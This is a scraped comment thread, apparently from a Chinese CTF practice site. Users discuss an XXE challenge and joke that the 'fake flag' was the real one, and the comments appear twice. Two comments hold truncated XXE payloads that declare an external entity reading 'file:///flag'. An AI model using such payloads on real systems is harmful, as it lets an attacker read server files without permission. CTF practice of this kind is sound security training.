<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE user [ <!ELEMENT name ANY > <!ENTITY admin SYSTEM "file:///flag" >]> <user><userna
真得出生出题人,假flag是真的,闲的这样搞
这个是xxe漏洞,所以在点击提交按钮时,修改Payload,内容如下:<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///flag">]> <user><use
找半天结果假flag是真的,很迷惑
...
评论
MRLD 1月前
举报
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE user [ <!ELEMENT name ANY > <!ENTITY admin SYSTEM "file:///flag" >]> <user><userna
MRLD 1月前
举报
真得出生出题人,假flag是真的,闲的这样搞
gooddemo 2月前
举报
这个是xxe漏洞,所以在点击提交按钮时,修改Payload,内容如下:<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///flag">]> <user><use
hopeinhand 4月前
举报
找半天结果假flag是真的,很迷惑